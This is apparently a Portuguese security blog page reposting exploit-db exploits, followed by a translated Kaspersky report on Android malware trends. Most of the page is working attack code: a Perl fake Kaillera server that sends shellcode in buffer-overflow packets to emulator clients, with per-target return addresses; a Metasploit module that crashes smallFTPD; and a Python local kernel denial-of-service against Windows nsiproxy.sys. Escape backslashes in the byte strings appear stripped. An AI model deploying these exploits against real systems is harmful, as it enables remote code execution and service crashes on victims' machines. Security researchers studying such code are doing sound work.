"x59xc1x53x90x5cx06xe8xacxd5xa9x3fx25xadx8d" .
"x9bx6dx76xafxbaxcbxd9xd0xddxb4x86x74x95x57" .
"xd3x0fxf4x3dx22x9dx82x7bx24x9dx8cx2bx4cxac" .
"x07xa4x0bx31xc2x80xe3x7bx4fxa0x6bx22x05xf0" .
"xf6xd5xf3x37x0ex56xf6xc7xf5x46x73xcdxb2xc0" .
"x6fxbfxabxa4x8fx6cxccxecxf3xf3x5ex6cxdax96" .
"xe6x17x22x53";
########Variables##############
my $adjust ="x81xc4x54xf2xffxff"; # add esp, -3500 adjusts the stack
my $ack="x05x00x00x00x00x00x01x00x00x00x02x00x00x00x03x00x00x00"; #ACK packet in Kaillera protocol, see docs
my $ServerStatus="x04" . "x00" x 9; # No other users shown in server.
my $oldjunk="A" x 92; #For exploiting old Kaillera client username BOF.
my $junk="A" x 2082; #For exploiting P2P Kaillera client
my $suprajunk="A" x 2048; #Supraclient junk
my $MOTDHeader="x17" . "Server";
my $MOTDMessage="Hello, Welcome to the Server";
my $nseh="xebx06x90x90"; #short jmp for SEH exploits
my $seh, my $eip;
my $ServerExploit;
my $username;
my %inc; #increments a counter per client connected to us, each time a message is sent
my ($port, $ip, $help, $target, $listtarget, $listemu, $emu, $delay, $debug);
$port = 27888;
GetOptions(
'port=i'=>$port,
'ip=s' =>$ip,
'help' =>$help,
't=s' =>$target,
'emu=s' =>$emu,
'targets' =>$listtarget,
'delay=i' =>$delay,
'debug' =>$debug,
'emus' =>$listemu
);
if (defined $listtarget) {
print "rn=========Pick a version of Kaillera to attack :) ========rnrn" ;
print "1.  Kaillera 0.9/Anti3d  -t old rnrnPick emulator to target with -emu flag: mame32k, snes, mupenrnrn";
print "2.  SupraclientCPPE 0.85.2  -t supra:rnrnPick emulator to target with -emu flag: mame32, mupenrnrn";
print "3.  Open Kaillera n02v0r6  -t p2p (Universal Exploit)rn" ;
}
if (defined $listemu) {
print "rn=========Specific versions of emulators being attacked :) ============" . "rnrn" ;
print "Mame32k 0.64  -emu mame32krnrn";
print "Mame32++ 0.117  -emu mame32rnrn";
print "Mupen64k 0.7.9  -emu mupenrnrn";
print "Snes9k 0.09  -emu snesrn";
}
help() if($help or not defined $ip or not defined $target);
#Note: add new targets like this, but make sure to use $variable when redefining, not "my $variablename" or it wont work from earlier scope.
#Also, note that target "old" uses SEH-based overflow while target "supra" uses EIP overwrite.
if ($target eq "old") {
if (not defined $emu) {
print "rnPick an emulator to target, this exploit isn't universalrn";
help();
}
if ($emu eq "mame32k") {
print "rnTargetting Mame32k 0.64 running with Kaillera client 0.9...rn";
$seh=pack('V',0x010B3A06); # #pop ebx - pop esi - ret at 0x010B3A06 [mame32k.exe]
}
elsif ($emu eq "snes") {
print "rnTargetting Snes9k 0.09 running with Kaillera client 0.9...rn";
$seh=pack('V',0x10018ECD); # pop ebx - pop ecx - ret at 0x10018ECD [sdl.dll]
}
elsif ($emu eq "mupen") {
print "rnTargetting Mupen64k 0.7.9 running with Kaillera client 0.9...rn";
$seh=pack('V', 0x67F46FEF); #pop edi - pop ebp - ret at 0x67F46FEF [mupen64_rsp_hle.dll].
}
else {
print "rnPick a valid emulator to target: -emus to list emulators rn";
help();
}
}
elsif ($target eq "p2p") {
print "rnTargetting P2P Client (Universal exploit)...rn";
if (defined $emu) {
print "rnUniversal exploit, no emu necessary...rn";
help();
}
}
elsif ($target eq "supra") {
if (not defined $emu) {
print "rnPick an emulator to target, this exploit isn't universalrn";
help();
}
if ($emu eq "mame32") {
print "rnTargetting Mame32++ 0.117 running with Supraclient...rn";
$eip=pack('V', 0x01C01104); #jmp esp in mameppkgui.exe
}
elsif ($emu eq "mupen") {
print "rnTargetting Mupen64k 0.7.9 running with Supraclient...rn";
$eip=pack('V', 0x10021C16); #jmp esp at 0x10021C16 [aziaudio.dll]
}
}
else {
print "rnPick a valid target, try -targets if you're lost.rn";
help();
}
my $hello = "HELLOD00D$port";
#Open a new socket, start an infinite loop receiving messages from clients
my $sock = IO::Socket::INET->new(Proto=>'udp', LocalPort=>$port) or die "Error opening $ip:$port rn$!";
print "Evil Kaillera Server Started on $ip:$port, waiting for victims :Drn";
my $msg_in;
my $MAX_MESSAGE_LENGTH=5000;
while (1) {
$sock->recv($msg_in,$MAX_MESSAGE_LENGTH);
my $packet = unpack 'H*', $msg_in;
if (defined $debug) {
print "Packet found: $packetn";
}
my $peerhost = $sock->peeraddr;
my $peerport = $sock->peerport;
#Check for client hello, send server hello
if ($msg_in =~ m/HELLO0.83/) {
print "Sending Hello...n";
$sock->send($hello);
}
#Since we're using an IF loop for username detection, the scope needs to be over everything else,
#because local machine processes data faster than incoming network data.
#Otherwise, username won't be detected until AFTER ServerAnnouncement is sent and it wont work.
if ($msg_in =~ m/x03(.*?x00)/){
my $username = $1 ;
my $ServerAnnounce="x02" . $username . substr(md5($username),0,2) . "x00" x 4 . "x01"; #Not Complete yet
if ($packet=~m/.{10}03/) {
if (defined $debug) {
print "Username $username foundrn" . "Sending ACKs to client...rn";
}
sendpacket($sock, $ack) for (1..3);
sleep 1;
}
sendpacket($sock, $ServerStatus);
print "Sending ServerStatus...rn";
sendpacket($sock, $ServerAnnounce);
if ($target eq "p2p") {
print "Attacking p2p client...rn";
$eip=pack('V',0x100123F3); # call esp in kailleraclient.dll, universal
sendpacket($sock, $MOTDHeader.$junk.$eip.$sc);
print "Sending MOTD payload to P2PClient...n";
if (defined $delay) {
sleep $delay;
}
}
if ($target eq "supra") {
print "Sending MOTD payload to Supraclientrn";
sendpacket($sock, $MOTDHeader.$suprajunk.$eip.$adjust.$sc);
if (defined $delay) {
sleep $delay;
}
}
if ($target eq "old") {
print "Sending Announce, MOTD to old kaillera client...rn";
sendpacket($sock, $MOTDHeader.$MOTDMessage);
my $ServerExploit="x02" . $oldjunk . $nseh . $seh . $sc;
print "Sending ServerStatus payload to 0.9 client...rn";
sendpacket($sock, $ServerExploit);
if (defined $delay) {
sleep $delay;
}
}
}
}
$sock->close;
########### FUNCTIONS #####################
sub help{
print "rnUsage: $0 -port=1111 -ip=1.1.1.1 -t=supra -emu=mame32 -targets -emus -delay 10 -debug -helpn";
exit 0;
}
#This sendmessage function takes a message and an ip, and sends it nicely - thanks jediknight304
#sendpacket($socket, $message, $anothermessage);
sub sendpacket{
my $sock = shift;
bless $sock, "IO::Socket::INET";
my @messages = @_;
my $numberofmessages = @messages;
my $messagesbyte = pack('c',$numberofmessages);#how many messages are in our packet
my $packet;
for(@messages){
#each client has to have an incrementing packet number
my $header = pack('v', $inc{$$sock->peeraddr}++) . pack ('v', length($_));
$packet .= $header.$_;
}
$$sock->send($messagesbyte.$packet) or die "Couldn't send:n$packetn$!";

}

 

Fonte: http://www.exploit-db.com/exploits/17460/

Smallftpd 1.0.3 FTP Server Denial of Service Vulnerability

Standard

Exploit para dos no SmallFTPD:

# Exploit Title: smallFTPD Connection Saturation Remote Denial of Service

# Date: June 27, 2011
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://smallftpd.sf.net
# Version: 1.0.3-fix and earlier
# Tested on: windows xp, seven, 2k3
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'smallFTPD Connection Saturation Remote Denial of Service',
'Description' => %q{
This module triggers unauthenticated Denial-of-Service condition in SmallFTPD server versions 1.0.3-fix and earlier with a few dozens of connection requests. The vulnerability is probably conerned with smallftpd being unable to handle multiple connections regardless of its maximum connection settings. Upon successful DoS exploit, the smallftpd will crash or still seem functioning by showing its service banner. But in fact it stops denying new FTP requests, which can be verified only through a valid login.
},
'Author' => [ 'Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision:  $',
'References' =>
[
[ 'URL', 'http://core.yehg.net/lab/pr0js/advisories/smallftpd_103-fix_saturation_dos' ]
],
'DisclosureDate' => 'June 2010'))
register_options(
[
Opt::RPORT(21)
],self.class)
end
def run
print_status("Sending DOS Packets ...")
35.times do |x|
connect
sock.put("USER CRASHEDrn")
disconnect
end
print_good("Done")
end

end

 

Fonte: http://www.exploit-db.com/exploits/17455/

Windows 2008 server exploit DOS

Standard

#!/usr/bin/python

############################################################################
##
## Title: Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
## Author: Lufeng Li of Neusoft Corporation
## Vendor: www.microsoft.com
## Vulnerable: Windows Vista/Server 2008
##
############################################################################
from ctypes import *
kernel32 = windll.kernel32
Psapi = windll.Psapi
if __name__ == '__main__':
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2
SYM_NAME = "\\.\Nsi"
dwReturn = c_ulong()
out_buff = ''
in_buff = ("x00x00x00x00x00x00x00x00xecx2dx39x6ex07x00x00x00"
"x01x00x00x00x00x00x00x00x38x89x6cx01x08x00x00x00"
"x00x00x00x00x00x00x00x00x10xfax78x00x28x00x00x00"
"x38xfax78x00x0cx00x00x00")
handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ | GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None)

dev_ioct = kernel32.DeviceIoControl(handle, 0x12003f, in_buff,len(in_buff), out_buff, len(out_buff),byref(dwReturn), None)

 

E o fim do filme é:

2008

2008

Fonte: http://www.exploit-db.com/exploits/17305/

Kaspersky: Android é o Novo Windows

Standard

As pragas tecnológicas estão se propagando de uma maneira tão veloz, que a situação da segurança no Android já se assemelha cada vez mais com a situação vivenciada pelos usuários no Window$. Esta é a opinião clara dos especialistas em segurança da Kaspersky, em seu relatório de malware divulgado para o primeiro trimestre de 2011. Os especialistas também se expandem em comentar que já existe uma “infinidade de dispositivos Android” com o software desatualizado, e que este software pode conter várias vulnerabilidades não corrigidas.

A política de atualização de fabricantes que estão negligenciando esse quadro é criticada severamente (e com muita razão), porque esses mesmos fabricantes podem vender uma quantidade imensa de aparelhos com Android no mercado, e deixá-los vulneráveis ​​e com versões antigas do sistema em questão. O foco é a comercialização, é o lucro, deixando assim, a segurança como fator irrelevante.

Além disso, pode haver pouco ou absolutamente nenhum interesse em apoiar modelos obsoletos de forma emergencial. “É possível discutir seriamente a segurança em situações como essas?” Eis a importante questão que consta no relatório. A partir de informações do próprio Google, mais de 95 por cento dos aparelhos que vem com o sistema Android não está executando a versão mais recente da plataforma móvel.

Usuários Acham que Estão Isentos de Infecção por Malware

A semelhança próxima com o Windows, é de que os usuários tendem a ignorar os alertas de segurança quando qualquer aplicativo for instalado ou iniciado pela primeira vez, dando-lhes privilégios como o SMS (através de rubber-stamping approval), sem que levem em consideração as suas reais e sérias conseqüências. Os dispositivos de maior risco foram, segundo relatou a Kaspersky, os que tinham sido desbloqueados (ou “rooted”) para dar ao usuário o acesso de nível pleno de administrador no sistema.

A Kaspersky também aponta que o malware móvel está se movendo com a pior das intenções de comandar e controlar redes, que ele acredita que levarão ao surgimento de botnets móveis. Toda essa situação exige uma ampla reflexão sobre o crescimento e o desenvolvimento do malware do Windows. Finalmente, a especialistas notam que, embora o Google tenha a capacidade de remover de forma remota os aplicativos “desonestos”, os sistemas de controle podem ser ignorados.

Diante dessas análises minuciosas e importantes conclusões, a Kaspersky acredita que a quantidade de malware móvel novo dobrará, passando de 500 no ano passado para pouco mais de mil neste ano de 2011, números que tornam-se alarmantes para a área de segurança.

Embora a taxa de crescimento seja bastante rápida, ela está longe dos níveis incontroláveis ​​apresentados pelo Windows, mas ainda representa uma tendência preocupante como os dispositivos que são propensos a se tornar mobile wallets em um futuro próximo, e que já possuem uma grande quantidade de informações pessoais e profissionais. O importante é não subestimar os riscos e ter o cuidado máximo com as informações armazenadas em tais dispositivos.

Top 20 “Pragas” para Android na Internet

Ranking Name Percentage of all attacks (%)*
1 Blocked 66.16%
2 Trojan,Script,Iframer 20.43%
3 Exploit,Script,Generic 14.68%
4 Trojan,Win32,Generic 9.59%
5 Trojan,Script,Generic 8.91%
6 Trojan-Downloader,Script,Generic 8.12%
7 AdWare,Win32,HotBar,dh 3.40%
8 AdWare,Win32,FunWeb,gq 3.26%
9 Trojan,HTML,Iframe,dl 2.16%
10 Exploit,JS,Pdfka,ddt 1.82%
11 Exploit,HTML,CVE-2010-1885,ad 1.73%
12 Hoax,Win32,ArchSMS,pxm 1.59%
13 Trojan,JS,Popupper,aw 1.57%
14 Hoax,Win32,ArchSMS,heur 1.57%
15 Trojan-Downloader,Win32,Generic 1.56%
16 Trojan-Downloader,Java,OpenConnection,cx 1.55%
17 Trojan-Downloader,Java,OpenConnection,cg 1.33%
18 Exploit,HTML,CVE-2010-1885,aa 1.33%
19 Trojan-Downloader,HTML,Agent,sl 1.24%
20 Trojan-Downloader,Java,OpenConnection,cf 1.15%

 

Paises mais afetados

estatistica

 

 

De um ponto de vista pessoal, tenho em mente que o que é mais usado também torna-se mais visado, visto que surgem mais bugs e arestas se pensado na questão SEGURANÇA…. Nada mais normal aparecer vulnerabilidades em um Sistema Operacional que está a caminho do “Monopólio” do mercado Mobile. Não sou Xiita ao ponto de falar que por ser Unix-Based é um sistema 100% seguro, acredito muito no sistema de permissões dos sistemas Unix-Based mas nada é inquebrável ou totalmente seguro. Tenho plena certeza que a Google aprenderá com o tempo e principalemente com os erros.

[via] [Trandução]